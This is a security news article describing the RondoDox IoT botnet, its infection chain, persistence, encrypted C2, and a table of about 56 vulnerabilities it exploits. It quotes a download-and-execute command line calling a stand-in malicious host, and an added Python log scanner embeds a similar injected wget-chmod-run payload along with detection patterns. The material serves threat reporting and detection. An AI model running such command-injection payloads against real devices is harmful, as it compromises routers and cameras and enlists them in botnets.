
RondoDox Botnet Exploits 50+ Vulnerabilities to Attack Routers, CCTV Systems and Web Servers

Since its emergence in early 2025, RondoDox has rapidly become one of the most pervasive IoT-focused botnets in operation, targeting a wide range of network-connected devices—from consumer routers to enterprise CCTV systems and web servers.

Its modular design allows operators to deploy tailored exploit modules against over 50 distinct vulnerabilities, enabling swift compromise of disparate platforms.

In many attack campaigns, adversaries have leveraged automated scanning to identify exposed devices, followed by rapid exploitation and command-and-control enrollment.

Trend Micro researchers identified RondoDox in April 2025 after observing anomalous traffic patterns emanating from compromised DVR appliances in multiple regions.

Subsequent analysis revealed a core engine written in Go, facilitating cross-platform deployment and efficient binary size.

The botnet’s command protocols support encrypted communications, ensuring stealthy C2 exchanges even under network monitoring.

Upon successful exploitation, RondoDox deploys a lightweight persistence agent designed to survive device reboots and firmware updates.

This agent periodically polls C2 servers for new payloads or commands, while self-healing routines reinstall components if removed.

Infections frequently culminate in the device participating in large-scale DDoS attacks or clandestine proxying for subsequent threat operations.

Infection Mechanism

RondoDox’s infection chain typically begins with a reconnaissance phase in which the malware’s scanning module probes devices for open Telnet (port 23), SSH (port 22), and HTTP management interfaces.

Once a target is identified, the appropriate exploit payload—drawn from its extensive repository—is delivered.

For instance, in one module, the scanner uses the CVE-2021-20090 router authentication bypass to execute a shell payload:

wget http[:]//malicious.example/exploit; chmod +x exploit
./exploit -u admin -p '' -c 'wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./rondox'

After initial code execution, the payload establishes an encrypted TLS channel back to C2 on port 443, disguising its traffic as legitimate HTTPS.

Trend Micro analysts noted that this encryption scheme relies on a custom certificate bundle, complicating interception and inspection efforts.

Once communication is established, the bot requests and loads additional modules—such as network scanners or DDoS tools—directly into memory.
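Most of the exploits in RondoDox's library are command injections against HTTP management interfaces, and the payload they carry has the shape shown above: fetch a binary, mark it executable, run it. The following added example (not code from the article or from Trend Micro) scans constructed web-server access-log lines for that download-and-execute chain, decoding URL-encoded (including double-encoded) request parameters first; the CGI path, hostnames and addresses are made up for the example.

```python
import re
from urllib.parse import quote, unquote

# Constructed combined-format access log from a router's web management interface.
# IPs are RFC 5737 documentation addresses; the CGI path and hostnames are made up.
PAYLOAD = "wget http://198.51.100.20/rondox -O /tmp/r; chmod +x /tmp/r; /tmp/r"
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [12/Oct/2025:03:14:01 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '203.0.113.7 - - [12/Oct/2025:03:14:09 +0000] "GET /cgi-bin/ping.cgi?host=;'
    + quote(PAYLOAD, safe="") + ' HTTP/1.1" 200 0',
    # Same chain, double URL-encoded to slip past single-pass keyword filters.
    '203.0.113.8 - - [12/Oct/2025:03:14:12 +0000] "POST /cgi-bin/ping.cgi?host=%26%26'
    + quote(quote(PAYLOAD, safe=""), safe="") + ' HTTP/1.1" 200 0',
])

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Pieces of a download-and-execute chain smuggled into a request parameter.
DOWNLOADER = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I)
MAKE_EXEC = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b")
RUN_STAGED = re.compile(r"(?:^|[;&|]\s*)(?:sh\s+)?(?:\./|/tmp/|/var/tmp/|/dev/shm/)\S+")
SHELL_SEP = re.compile(r"[;&|`]|\$\(")

def decode_target(target, rounds=3):
    """URL-decode until stable (bounded); injected payloads are often double-encoded."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def indicators(decoded):
    """Chain stages present in a decoded target; empty unless separator + downloader + follow-on."""
    checks = (("downloader", DOWNLOADER), ("chmod", MAKE_EXEC), ("exec", RUN_STAGED))
    found = [name for name, rx in checks if rx.search(decoded)]
    if SHELL_SEP.search(decoded) and "downloader" in found and len(found) >= 2:
        return found
    return []

def scan_access_log(text):
    """One finding per request whose decoded target carries a staged-payload chain."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_target(m["target"])
        hits = indicators(decoded)
        if hits:
            findings.append({"line": lineno, "ip": m["ip"], "method": m["method"],
                             "decoded_target": decoded, "indicators": hits})
    return findings
```

Run `scan_access_log(SAMPLE_LOG)` to see the two injected requests reported with their decoded command chains while the benign request is ignored; the same function can be pointed at a real access log read from disk.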

The multi-stage infection flow highlights the transition from reconnaissance to exploitation and persistence.

A timeline of the RondoDox vulnerability (Source – Trend Micro)

Following the infection mechanism, RondoDox leverages device-specific persistence techniques, such as crontab entries on Linux-based DVRs or firmware image modification on certain router models, ensuring continued operation.

Its adaptability and broad exploit library underscore the urgent need for patch management and network segmentation to mitigate this evolving threat.

The table below lists all 50+ vulnerabilities currently exploited by RondoDox, with the vendor or product affected, the CVE identifier where one exists, the weakness type (CWE), and the status of each exploit.

| # | Vendor / Product | CVE ID | CWE / Type | Status | Notes |
|---|---|---|---|---|---|
| 1 | Nexxt Router Firmware | CVE-2022-44149 | CWE-78 (Command Injection) | N-Day | |
| 2 | D-Link Routers | CVE-2015-2051 | CWE-78 | N-Day | |
| 3 | Netgear R7000 / R6400 | CVE-2016-6277 | CWE-78 | N-Day | |
| 4 | Netgear (mini_httpd) | CVE-2020-27867 | CWE-78 | N-Day | |
| 5 | Apache HTTP Server | CVE-2021-41773 | CWE-22 (Path Traversal / RCE) | N-Day | |
| 6 | Apache HTTP Server | CVE-2021-42013 | CWE-22 | N-Day | |
| 7 | TBK DVRs | CVE-2024-3721 | CWE-78 | Targeted | |
| 8 | TOTOLINK (setMtknatCfg) | CVE-2025-1829 | CWE-78 | N-Day | |
| 9 | Meteobridge Web Interface | CVE-2025-4008 | CWE-78 | N-Day | |
| 10 | D-Link DNS-320 | CVE-2020-25506 | CWE-78 | N-Day | |
| 11 | Digiever DS-2105 Pro | CVE-2023-52163 | CWE-78 | N-Day | |
| 12 | Netgear DGN1000 | CVE-2024-12847 | CWE-78 | N-Day | |
| 13 | D-Link (multiple) | CVE-2024-10914 | CWE-78 | N-Day | |
| 14 | Edimax RE11S Router | CVE-2025-22905 | CWE-78 | N-Day | |
| 15 | QNAP VioStor NVR | CVE-2023-47565 | CWE-78 | N-Day | |
| 16 | D-Link DIR-816 | CVE-2022-37129 | CWE-78 | N-Day | |
| 17 | GNU Bash (ShellShock) | CVE-2014-6271 | CWE-78 (Code Injection) | N-Day / Historical | |
| 18 | Dasan GPON Home Router | CVE-2018-10561 | CWE-287 (Auth Bypass) | N-Day | |
| 19 | Four-Faith Industrial Routers | CVE-2024-12856 | CWE-78 | N-Day | |
| 20 | TP-Link Archer AX21 | CVE-2023-1389 | CWE-78 | Targeted | |
| 21 | D-Link Routers | CVE-2019-16920 | CWE-78 | N-Day | |
| 22 | Tenda (fromNetToolGet) | CVE-2025-7414 | CWE-78 | N-Day | |
| 23 | Tenda (deviceName) | CVE-2020-10987 | CWE-78 | N-Day | |
| 24 | LB-LINK Routers | CVE-2023-26801 | CWE-78 | N-Day | |
| 25 | Linksys E-Series | CVE-2025-34037 | CWE-78 | N-Day | |
| 26 | AVTECH CCTV | CVE-2024-7029 | CWE-78 | N-Day | |
| 27 | TOTOLINK X2000R | CVE-2025-5504 | CWE-78 | N-Day | |
| 28 | ZyXEL P660HN-T1A | CVE-2017-18368 | CWE-78 | N-Day | |
| 29 | Hytec HWL-2511-SS | CVE-2022-36553 | CWE-78 | N-Day | |
| 30 | Belkin Play N750 | CVE-2014-1635 | CWE-120 (Buffer Overflow) | N-Day | |
| 31 | TRENDnet TEW-411BRPplus | CVE-2023-51833 | CWE-78 | N-Day | |
| 32 | TP-Link TL-WR840N | CVE-2018-11714 | CWE-78 | N-Day | |
| 33 | D-Link DIR820LA1 | CVE-2023-25280 | CWE-78 | N-Day | |
| 34 | Billion 5200W-T | CVE-2017-18369 | CWE-78 | N-Day | |
| 35 | Cisco (multiple products) | CVE-2019-1663 | CWE-119 (Memory Corruption) | N-Day | |
| 36 | TOTOLINK (setWizardCfg) | CVE-2024-1781 | CWE-78 | N-Day | |
| 37 | Hikvision NVR | — | Command Injection | No CVE | Listed by Trend Micro w/o CVE |
| 38 | Dahua DVR | — | Remote Code Execution | No CVE | Listed by Trend Micro w/o CVE |
| 39 | Wavlink Routers | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 40 | ZTE ZXHN Router | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 41 | Seenergy NVR | — | Authentication Bypass | No CVE | Listed by Trend Micro w/o CVE |
| 42 | Uniview NVR | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 43 | TP-Link TD-W8960N | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 44 | Dahua IP Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 45 | HiSilicon Firmware | — | Buffer Overflow | No CVE | Listed by Trend Micro w/o CVE |
| 46 | Amcrest Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 47 | Hikvision IP Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 48 | LILIN Camera | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 49 | TP-Link WR941N | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 50 | Wavlink WL-WN575A3 | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 51 | Dahua NVR | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 52 | Tenda AC6 | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 53 | Hikvision DS-7108HGHI | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 54 | LB-LINK BL-WR450H | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 55 | ZTE ZXHN H108N | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |
| 56 | Wavlink WL-WN531G3 | — | CWE-78 | No CVE | Listed by Trend Micro w/o CVE |

The post RondoDox Botnet Exploits 50+ Vulnerabilities to Attack Routers, CCTV Systems and Web Servers appeared first on Cyber Security News.

Source: cybersecuritynews.com